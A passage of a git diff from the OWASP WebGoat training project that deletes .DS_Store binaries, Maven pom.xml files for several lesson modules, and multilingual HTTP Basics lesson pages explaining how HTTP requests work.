z4ZZ@t0=@#i0=@#i0{;aC=$*}yu*G}d?e%kC0bhZuQUUgSh|s}o)U(U3<&O@^_!fX{
zIW_Y{W!eYun22Yio?Uh=52Z2P-2-}|=xs634X6GHb0-`1?6Pa!a6mU4&^t4FI~3$+
zr??1r2aLMb&wT}a1vV?dZktLdfCfpJTfcv|lGO7@GGpkr)6ubpfwJ<79hE{*+{u1Y
zNW3dHZxv#W;^gcBC3}X~bX7}w<uS#XFP6tG%eY)tl9RetNJx7IEz?nSQ_HRkosH|J
zY83{ooT=KgF?YPUt~&Dxsdg-@<tcPbF||qE)|0xSJNFAg_De_&i;HcYUESTSk<Ol;
zrPjz|XLom3Yozy3&(f0gogg%{9O@sP&MZB-vijQVZ=8Gc!bMjM^d2ZsQzFhMo0T!<
zI%6p-omuBuqMc#q$C3uqE?^b4`*xjn@=!>;Jt0-I>o}cpbj!3SwX97xAywHV=!ukN
zde<3GSw=2x+6gI?QjAp2P#mq_Fk<=xnmy%c3l1yI*jCmV<c<kR%GuhT8u{sYZHT<>
zDV>I6ZW0FH+Eu%EU*mzcuHGY;c3)E^g{nnyh6FYp{a#(mP868R(~6zaOjS4M;&~>q
zp^ckLS_=g}3kG@AwRN&MtJ2t`mdfH(={>>iX{eLsGpuJYt5L2B0uR_9k;QSFO+oP-
zo0>&&{61P|$@T_qIVj2#hLY3_Ne#MT?Kg>XJnu>)o%9;JdqjDP79dTNwnNzJHTNBs
z<-6ILPbs!@I-{91tBZ8{qsMOBE!W8d#Y-u@L_wHlQT?h)vu%tXaF;dM813*DSb%zH
zrx(z1n57#e183nWcp9F8mtYmn!@KYiT!2sEbNB+jgf;jPeuAIj7x)eSL_kClt1yJs
zScBK$_1K6_*o^JigEwO@_F+Gsz>|0iM{yDpn8XySn8pY3A$%B@@d<nuU&L2&1y}JM
zJdf|=2kx8#MO;VLK}bdXn6k|<(uX(>WBf`mhKFm!k$(rqwOuZPHG673Ci^chY{^ot
zXNrU5lEMip62c+ffaN6uwSI4d7@i=|w1v{8FCrmTx)?F<{gH535;!@m+SE+d0O2k0
zv04s>MX8KK%zBB>uvEcuWmO_ml*&2KtlD>&dUtScS@q~K>IL^EV)bBiSfr=c-$8B#
z-i8l3ZePJS@ICwhzrybXS_MH?hxLS5828}~*n&4=E4C42eRvDribrr5M+mh$2)1!T
zZ3?GxhG5fh4(CzFEIOFS0xsYqcorYU$MA7N?>T%PU%;2~l@jQVmq2%JGjwTdXh_XD
zDS)r-iZJ&t!7^>B+jwN=w|ma!V_DO%%sCprctdQQnqS*qfil-cX8Zr)t-t?oKalU?
zE8r{ezf}OshhjqmH2tj}r2*=T&~XnPEHS@j*YXg`m<wy?+i|jNU%?ZVBdkC+>e*%2
YQVXSj{6oNof4Bbo-+%ve46nNEFVWu}lmGw#

diff --git a/webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/owasp/webgoat/.DS_Store b/webgoat-lessons/csrf/webgoat-lesson-template/src/main/java/org/owasp/webgoat/.DS_Store
deleted file mode 100644
index 3efe5f71232d664d8ac3a94aab516092ac613b82..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLU1%It6h3G3)7fcjW|PKD8n<0Zf=x|g{%TTf>*mk2wxPjIvPl|UXLrVAaCT<d
znca=XXr$mDqWA-XpkSg_6#JwoJ_x>)iuear%!9rNqCN>e34)$`XSO7prXU3^bnbHR
zx%ZxP?!EKfZ|>bQ0DuEIwG%)F0D&@-(sn8?k(i$4O)22@FeQ>dfDUG|U}utsmE2_Q
zclZeS2>1y22>1y22wV*a(4Ebau*JRaYW>njz(?SkM1Y+S5z0(PJ-O^kesoa5LjaQH
z)XfvsDGuO15l==vx$H{rN@Kdw1A4CLg&63%lRm=CNk%=n>`K=i&~*p&W=1bUK|VYA
zMYuU&)RlheBj6*j83Fd%R6+&}$iZAm{Qg%mW9YWi(Xobsvhs?`Z9-7o&VEuzyeBqq
z6=II!<m>?@dy2PoRZDvHF~ylL*2gW&xL8+`le$(&NV^6t(@}I&%dT^sjq9dr6$Y%F
zsoJwKcf7c+I`avsb}Xyq$#qOIwMpI9le(ch4+=r{OGpiii*21<-QBH`&Yqs7*2rRK
zcXwB7r1wD2(vtLpAT+cb=pUWVEIqxl`o^1Yoq7A*c^3-wjuWUUf#$PPT#UKSSjtLg
z*4b^q&9L)h?st!XRmAQ4b-2kxA@R<HRL!2@WX91g)1K6_HpzrkWfPdkQkLmGV?1RU
zxwL5~q)<vRQaM9$w0^^g=?`i4l%p*;tTtm?S!a+NCL}3mYj<m8r{}dHvbLvm8jhJs
z7<^|(?e0B|``WsC4_(-KU6mB77R4C?*L3vzbuBwlU<gkuc1kl<-JFZ(8N7xzZYpUl
z6!;<-<X+d;$>OX^V~<)Y^HZe{1Xt5gC(EapW-zN!sR{yj*c*|>ahokc@eG@qMREKA
z+GEM~25s3d$`gi?)C@@tx^C^ah;lsdLL(jbI=g#Bd5Yjq)1vJVwtC%t2W9zQHuDL^
zc1~tAlU8+}raye-j-7IyJWza;(nl18Y39|hs<hh1=stH-gN@M+Z+iu(hjzMpj>0Tx
z^m?3zXW&_Q4qky(I1BH?CvXlvhcDqP_!`#WXZQtvh2P*0_!|KcMXbUQR$~p`fHz_z
zHeoZiV-Mbnz1WBScnpu@2^_^qOkfgIsA3u)#z*i`T*jyHd3+gP#}!<~_wX!!h#$FY
z3KXe2vW|jO#ZRdyrK0x<E)c&I6~n_d;>iC)#kCzS0c&>EdW`J9xUD4{xt>v+MlMe{
ze~SFz6x~3|3q;fU-3?-Rf@r2Klx}>H5Yjf6M9g|`Bpj9m&KuTjYNlp@$Sv@(TK0!U
zsf<&YX^EX-se+T0HHnv^RL<$lntcaJTgh3=num{&7Ti~ewS&!Jk<P1sL%0=q7e3}>
z`v$&)AK@qX9sVSmRS?DMu$~AO#yxlww&2a!ifu%(KD-TY$3r-bBSf^jh-%|Rv?-j%
z8KRnob2yJWX3@bs7H|O{!_)XUK7mgX@m|0e@g;l}Un`;9(Gtp?DWzQ68X8h_P72^#
zyCTA^H&8Ndsh8Df<}ZJ`=3`mYu*^9cx%e9JN&Mmp5GZqfWfuPrZ~guM3TE(KeFS_2
zu66{ld?+?FK&#y9Xl1c>gz|lqSz>m}uH-IM@Nk?Y564NexPm9DM_7eq)RW7uq#jED
U`G)}h-`2nX{rjKO@0u<C0YK&!dH?_b

diff --git a/webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/.DS_Store b/webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/.DS_Store
deleted file mode 100644
index 6efa04a20a9e4d079ccb94bd03cc4336d7391b9f..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeH~y-veW426#&LY2C7WW2A?jq$1~PrwWCQv^sU9a{EmeQl0?jTDHGIx)~=$@e6_
zcCPXbaSXs#ADbnx05GGw;^@oNeBXUy7a6&vnm=Q+f9fB1yPh|vn%8!C#Q|IN<N6M7
zSmFln<KPv8TRh+e&)APQPCZU}A|L`HAOa$A_5`v`&*o=OLI6ZS1b!0m??a)x*3_YC
zd^)(q2te%^4&!yq64c@WYE2!QGD5RfN^PZ<BZjqd#!Kea)S+oBhvo2Ld9vk%VsSd3
zUm_h=n`#vS5%^BPXK&iV`~NNdm-*jwWFjB}|CE4r>$~-eFPFV_@|xaj3;mw{Wz3Cq
mF42mq(TaKFt@wJBSNxj$HFanj<%~x;RX+mGMJ57&LEsaswH=rM

diff --git a/webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/html/.DS_Store b/webgoat-lessons/csrf/webgoat-lesson-template/src/main/resources/html/.DS_Store
deleted file mode 100644
index 5008ddfcf53c02e82d7eee2e57c38e5672ef89f6..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeH~Jr2S!425mzP>H1@V-^m;4Wg<&0T*E43hX&L&p$$qDprKhvt+--jT7}7np#A3
zem<@ulZcFPQ@L2!n>{z**<q8>++&mCkOWA81W14cNZ<zv;LbK1Poaz?KmsK2CSc!(
z0ynLxE!0092;Krf2c+FF_Fe*7ECH>lEfg7;MkzE(HCqgga^y>{tEnwC%0;vJ&^%eQ
zLs35+`xjp>T0<F0fCPF1$Cyrb|F7^5{eNG?83~ZUUlGt@xh*qZDeu<Z%US-OSsOPv
j)R!Z4KLME7ReXlK;d!wEw5GODWMKRea10D2@KpjYNUI8I

diff --git a/webgoat-lessons/hijack-session/pom.xml b/webgoat-lessons/hijack-session/pom.xml
deleted file mode 100644
index 484f96692..000000000
--- a/webgoat-lessons/hijack-session/pom.xml
+++ /dev/null
@@ -1,58 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0"
-	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-	<modelVersion>4.0.0</modelVersion>
-	<artifactId>hijack-session</artifactId>
-	<packaging>jar</packaging>
-	<parent>
-		<groupId>org.owasp.webgoat.lesson</groupId>
-		<artifactId>webgoat-lessons-parent</artifactId>
-		<version>8.2.3-SNAPSHOT</version>
-	</parent>
-
-	<properties>
-		<jacoco.version>0.8.7</jacoco.version>
-	</properties>
-
-	<profiles>
-		<profile>
-			<!-- mvn clean verify -Pcoverage -->
-			<id>coverage</id>
-			<activation>
-				<activeByDefault>false</activeByDefault>
-			</activation>
-			<build>
-				<plugins>
-					<plugin>
-						<groupId>org.jacoco</groupId>
-						<artifactId>jacoco-maven-plugin</artifactId>
-						<version>${jacoco.version}</version>
-						<executions>
-							<execution>
-								<id>default-prepare-agent</id>
-								<goals>
-									<goal>prepare-agent</goal>
-								</goals>
-							</execution>
-							<execution>
-								<id>default-report</id>
-								<phase>verify</phase>
-								<goals>
-									<goal>report</goal>
-								</goals>
-								<configuration>
-									<dataFile>${project.build.directory}/jacoco.exec</dataFile>
-									<outputDirectory>${project.reporting.outputDirectory}/jacoco</outputDirectory>
-									<excludes>
-										<exclude>**/HijackSession.*</exclude>
-									</excludes>
-								</configuration>
-							</execution>
-						</executions>
-					</plugin>
-				</plugins>
-			</build>
-		</profile>
-	</profiles>
-
-</project>
diff --git a/webgoat-lessons/html-tampering/pom.xml b/webgoat-lessons/html-tampering/pom.xml
deleted file mode 100755
index ab3516c57..000000000
--- a/webgoat-lessons/html-tampering/pom.xml
+++ /dev/null
@@ -1,27 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>html-tampering</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-
-
-    </dependencies>
-
-</project>
diff --git a/webgoat-lessons/http-basics/pom.xml b/webgoat-lessons/http-basics/pom.xml
deleted file mode 100644
index 4448eebfd..000000000
--- a/webgoat-lessons/http-basics/pom.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>http-basics</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-</project>
diff --git a/webgoat-lessons/http-basics/src/main/resources/lessonPlans/de/HttpBasics.html b/webgoat-lessons/http-basics/src/main/resources/lessonPlans/de/HttpBasics.html
deleted file mode 100644
index a41ca8309..000000000
--- a/webgoat-lessons/http-basics/src/main/resources/lessonPlans/de/HttpBasics.html
+++ /dev/null
@@ -1,29 +0,0 @@
-<div align="Center"> 
-<p><b>Lehrplan:</b> Http Basics </p>
- </div>
- 
-<p><b>Lehrinhalt:</b> </p>
- Diese Lektion stellt die Verst&auml;ndnis-Grundlagen f&uuml;r den Datentransport zwischen Browser und Webapplikation dar.<br>
-<div align="Left"> 
-<p>
-<b>So funktioniert HTTP:</b>
-</p>
-Alle HTTP Transaktionen folgen demselben Schema. Jede Anfrage vom Client und jede Antwort des Servers besteht aus drei Teilen: Der Anfrage-/Antwortzeile, dem Kopf und dem K�rper.
-Der Client initiiert eine Transaktion wie folgt:<br>
-<br>
- Der Client kontaktiert den Server und sendet eine Dokumentenanfrage<br>
-</div>
-  <br>
-<ul>GET /index.html?param=value HTTP/1.0</ul>
- Als n&auml;chstes sendet der Client optionale Kopfzeilen (Header) um den Server &uuml;ber die Client-seitige Konfiguration und die akzeptierten Dokumentenformate zu informieren.<br>
- <br>
-<ul>User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*</ul>
-Nachdem der eigentliche Anfrage (Request) und den weiteren Kopfzeilen (Header) kann der Client noch weitere Daten senden. Diese Daten werden meistens von CGI Programmen im Zusammenhang mit der POST Methode ausgewertet.
-<br>
-<p><b>Grunds&auml;tzliche(s) Ziel(e):</b> </p>
-<!-- Start Instructions -->
-Geben Sie Ihren Namen in das Eingabefeld ein und dr�cken sie "Los gehts!" um die Anfrage abzuschicken. Der Server wird die Anfrage akzeptieren, Ihre Eingabedaten umdrehen, und wieder zu Ihnen zur�ckschicken. Dies stellt eine vollst&auml;ndige HTTP Transaktion dar!
-<br/><br/>
-Sie sollten mit der Benutzung von WebGoat vertraut werden. Es sollten die Kn�pfe f&uuml;r Hinweise (Hints), f&uuml;r das Anzeigen von Parametern(Parameters) oder Cookies und f&uuml;r das Anzeigen von Java-Quellcode ausprobiert werden.
-Au�erdem, k&ouml;nnen Sie hier WebScarab gut ausprobieren. 
-<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/webgoat-lessons/http-basics/src/main/resources/lessonPlans/nl/HttpBasics_content1.adoc b/webgoat-lessons/http-basics/src/main/resources/lessonPlans/nl/HttpBasics_content1.adoc
deleted file mode 100644
index a4e516647..000000000
--- a/webgoat-lessons/http-basics/src/main/resources/lessonPlans/nl/HttpBasics_content1.adoc
+++ /dev/null
@@ -1,8 +0,0 @@
-
-Voer je naam in the input field below and press "Go!" to submit.	The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP	request.
-
-The user should become familiar with the features of WebGoat by manipulating the above buttons to view hints, show the HTTP request parameters, the HTTP request cookies, and the Java source code. You may also try using OWASP ZAP Attack Proxy to see the HTTP data.
-
-== Try It!
-
-Enter your name in the input field below and press "Go!" to submit. The server will accept the request, reverse the input and display it back to the user, illustrating the basics of handling an HTTP request.
\ No newline at end of file
diff --git a/webgoat-lessons/http-basics/src/main/resources/lessonPlans/ru/HttpBasics.html b/webgoat-lessons/http-basics/src/main/resources/lessonPlans/ru/HttpBasics.html
deleted file mode 100644
index ec21ec7ed..000000000
--- a/webgoat-lessons/http-basics/src/main/resources/lessonPlans/ru/HttpBasics.html
+++ /dev/null
@@ -1,33 +0,0 @@
-<div align="Center"> 
-<p><b>Название урока:</b> Основы Http </p>
- </div>
- 
-<p><b>Тема изучения:</b> </p>
-В данном уроке представлены основы необходимые для понимания процесса передачи данных между браузером и веб-приложением.<br>
-<div align="Left"> 
-<p>
-<b>Как работает HTTP:</b>
-</p>
-Все обращения по протоколу HTTP имеют один основной формат. Кажный запрос клиента или ответ сервера состоит из трёх частей:
-строка запроса или ответа, заголовок и тело. Клиент начинает предачу данных следующим образом: <br>
-<br>
- Он соединяется с сервером и отправляет запрос для получения документа <br>
-</div>
-  <br>
-<ul>GET /index.html?param=value HTTP/1.0</ul>
-Далее он шлёт различную информацию в разделе заголовка чтоб уведомить сервер о своей конфигурации и возможностях
-(например какие кодировки и типы документов поддерживаются клиентом).<br>
- <br>
-<ul>User-Agent: Mozilla/4.06<br />Accept: image/gif,image/jpeg, */*</ul>
-После отправки запроса и заголовков клиент может отправить дополнительные данные. Они в большинстве случаев
-предназначаются для CGI-программ использующих метод POST для принятия информации.<br>
-<p><b>Основные цели и задачи:</b> </p>
-<!-- Start Instructions -->
-Введите ваше имя в поле расположенное ниже и нажмите "Вперёд!" для отправки формы. Сервер примет ваш запрос, выстроит
-полученную строку в обратном порядке и выведет результат на экран. Данный пример иллюстрирует основы обработки данных
-полученных из HTTP-запроса.
-<br/><br/>
-Пользователю необходимо ознакомится с использованием функций WebGoat, таких как просмотр подсказок, отображение параметров HTTP-запроса, 
-отображение Cookies и исходных кодов Java. Первое время, в качестве практики, для просмотра параметров и Cookies
-запросов вы можете использовать WebScarab.
-<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/webgoat-lessons/http-basics/src/main/resources/lessonSolutions/en/HttpBasics_solution.adoc b/webgoat-lessons/http-basics/src/main/resources/lessonSolutions/en/HttpBasics_solution.adoc
deleted file mode 100644
index a6293919c..000000000
--- a/webgoat-lessons/http-basics/src/main/resources/lessonSolutions/en/HttpBasics_solution.adoc
+++ /dev/null
@@ -1,5 +0,0 @@
-= HTTP Basics 
- 
-== Solution 
-
-Solution goes here
\ No newline at end of file
diff --git a/webgoat-lessons/http-basics/src/main/resources/lessonSolutions/html/HttpBasics.html b/webgoat-lessons/http-basics/src/main/resources/lessonSolutions/html/HttpBasics.html
deleted file mode 100644
index 42219764e..000000000
--- a/webgoat-lessons/http-basics/src/main/resources/lessonSolutions/html/HttpBasics.html
+++ /dev/null
@@ -1,14 +0,0 @@
-<!DOCTYPE html>
-
-<html xmlns:th="http://www.thymeleaf.org">
-
-
-
-	<div class="lesson-page-wrapper">
-		<!-- reuse this block for each 'page' of content -->
-		<!-- include content here ... will be first page/tab  multiple -->
-		<div class="adoc-content" th:replace="doc:HttpBasics_solution.adoc"></div>
-	</div>
-
-
-</html>
\ No newline at end of file
diff --git a/webgoat-lessons/http-proxies/pom.xml b/webgoat-lessons/http-proxies/pom.xml
deleted file mode 100644
index 6e66fab3e..000000000
--- a/webgoat-lessons/http-proxies/pom.xml
+++ /dev/null
@@ -1,25 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>http-proxies</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-    </dependencies>
-
-</project>
diff --git a/webgoat-lessons/idor/pom.xml b/webgoat-lessons/idor/pom.xml
deleted file mode 100644
index 108e3ceae..000000000
--- a/webgoat-lessons/idor/pom.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>idor</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-</project>
\ No newline at end of file
diff --git a/webgoat-lessons/insecure-deserialization/pom.xml b/webgoat-lessons/insecure-deserialization/pom.xml
deleted file mode 100755
index 85a2499b1..000000000
--- a/webgoat-lessons/insecure-deserialization/pom.xml
+++ /dev/null
@@ -1,26 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>insecure-deserialization</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-
-    </dependencies>
-
-</project>
diff --git a/webgoat-lessons/insecure-login/pom.xml b/webgoat-lessons/insecure-login/pom.xml
deleted file mode 100755
index 1c382d4c0..000000000
--- a/webgoat-lessons/insecure-login/pom.xml
+++ /dev/null
@@ -1,25 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>insecure-login</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-    </dependencies>
-
-</project>
diff --git a/webgoat-lessons/jwt/pom.xml b/webgoat-lessons/jwt/pom.xml
deleted file mode 100644
index 535484960..000000000
--- a/webgoat-lessons/jwt/pom.xml
+++ /dev/null
@@ -1,26 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>jwt</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>io.jsonwebtoken</groupId>
-            <artifactId>jjwt</artifactId>
-            <version>0.9.1</version>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <version>5.4.5</version>
-            <scope>test</scope>
-        </dependency>
-    </dependencies>
-
-</project>
diff --git a/webgoat-lessons/logging/pom.xml b/webgoat-lessons/logging/pom.xml
deleted file mode 100755
index 515b25f51..000000000
--- a/webgoat-lessons/logging/pom.xml
+++ /dev/null
@@ -1,25 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>logging</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-    </dependencies>
-
-</project>
diff --git a/webgoat-lessons/missing-function-ac/.DS_Store b/webgoat-lessons/missing-function-ac/.DS_Store
deleted file mode 100644
index 0d597e3dbf596974fdd877729e0dab83badc8e41..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLT}&KB9RL3hN_Y6M1BG%uY`qkbiidKAf@o6@xMCaH6g}X8qPTavz{X|wa=Uk+
zgos9?ZPcjI2VYFAAJx9-ix29HFE*{l_+U*+)ED1;GEpCV@WKD=EFb0Lt<fgk+06WB
z{vWfmzxicmX8-_u3tAi?3;+scA$bKATO?r@c~c7c8WD#S4^A#)+8Jv7lgVxJ4io_b
z0RjO60RjO60RlGz0<>p~q-?YAOKVUD2m}b+k_d?PAxc@ugfEw*^p*}Pydwa~Qc`<~
z>RePvMtzy^<&u<Sp@cG&qzpy>h=DSk^ikh0;mai{WjLUJ_(1>7=$}x~dpq?X_1pmy
zQU+y!K!Ctz1jOE70uJOMo0(gGem4!rZEIV`P)X^IvYiSmuMiKfE`KaFW6z~r)h#%^
zYW|GZGBiEo*9TR1W~Dx4+vaLr&5RiO+$68<vn^LOEIq$2bRun7nmyNR7c9-0NXh=v
zhUU&p^18viUZl`L)zU`{$H*9_;Xb7>@l5iDg@x95M`w2|8gIXUF&15jx3?dPMY|4n
zEH3h26s6(r!#$_Qa*OBAzxVzJA71$A(q#z(`U?r{-T=y#HAFNgYi8&hgsTtI6zMjo
z%;|V4YtOE~@$j8Zr#L8YL_&{bauU&NtBA6Sa8GS--z4V+M}Jf|Ro5u$N!8VzNxsV=
zkWXZ7%m4Ot);0^X7FnvZs+ld2v)*HxDdTC~8Flq}SJcKGJMZ>+j-v*}3f&~H5!jv1
zxrS{yBYNH;$=Jopy2$><gRO_Uj$Ey}Z5L-XtTtT~;F|jIoWOldb+Wpp8P@bT&4%R~
zQ-+>r)uHd$kfqM*GO9kjm+{Y(35|wx%GQLB=2^n^;eCp7M(F$UI+aq*qTvIKtICi=
zLz7)Jv1Y~{HuNMBK!&!kn8GzSY^oXEl&bq!T;T&OU6kXO$`014RAY>d68N(;LPx5*
z!w)L_vhuii_es@pPv>-NZB!2_%9yb9Xqv7mjfsPD_8Svzvckniv=?G<6#8KtvS7g+
zybQ0vtME3Qhl}tjd;wp>CAb3L!1r(smf<J(8GeI5;7|Aq0U4HKC01b#HsI~JAMe0B
zu@&#dHjHBzCa?$lFo`E|7)Njn$1#g0&Z3Pud<I{_vv>~Q#JBJrydcLDTA^uDwpU90
zm}+Y@^Do{)>8)rM>92Y?`M=O?xl)j;x@LE6ozJ$O)!FiBw4NazDdensY*?A?4KsN?
z+4c|xBMofdcH|u<TIus1Px#KO!kb0e0guNVymq81(yS1Pc}SXDA~8WxULvg?^)$wJ
zNGp*}(3O`;Yd0gZ4KQ9Nn@1xF!9A`>=cY)KDIB+;*|sEmmnilLd<kC>#lD3f;8*w^
z{w7+LA;&#fj}fBPKD-N?u?6oTVs#R!y72)#g2%8QkK+j(z#$@68b>{HX*h+`XkZ>4
zEMO7m@mYKhpT`&QMSKlk$2TP1HjwT33eBYS$mo-8)=nn1f|~{Sv1{gY&%SEWwz1@9
zwp$^Ksk~*{)-?4ah+YORsI(VNgAVTc)mM%qC~qhNC9=1$_y;(){r&$9eP_^FfIxu2
z&4mD#CR52?8q><Z#>U}^vv!p76O=^~eoIn%Ayiy<5kPJKIPUpI$yLN8e7Pj07fO0B
Ul;nSO5fJSE!Tv7@c#Efh0lIMvPyhe`

diff --git a/webgoat-lessons/missing-function-ac/pom.xml b/webgoat-lessons/missing-function-ac/pom.xml
deleted file mode 100644
index 824944762..000000000
--- a/webgoat-lessons/missing-function-ac/pom.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>missing-function-ac</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-</project>
diff --git a/webgoat-lessons/missing-function-ac/src/.DS_Store b/webgoat-lessons/missing-function-ac/src/.DS_Store
deleted file mode 100644
index 0913be2c6a6da292e48938f7d77736dcbcacfda0..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLTWl0n82<llfgP@AxenBoiKPaxD5XG)0@-fMO(0aacaS=}Gqe+DXEr;tyJ%Cb
zF)A@?jF$&rOvDRHVtg<@853V5s6ijZ1RhL`iBX?SeDcAd|GDhC^b&khBXc%${&W7z
znSZ|X^_-pq0GKXWZ2&p|#OdLZEuw0c!tMN-QDRE7f+SKrWGg`->-t&h|31SzQbY(u
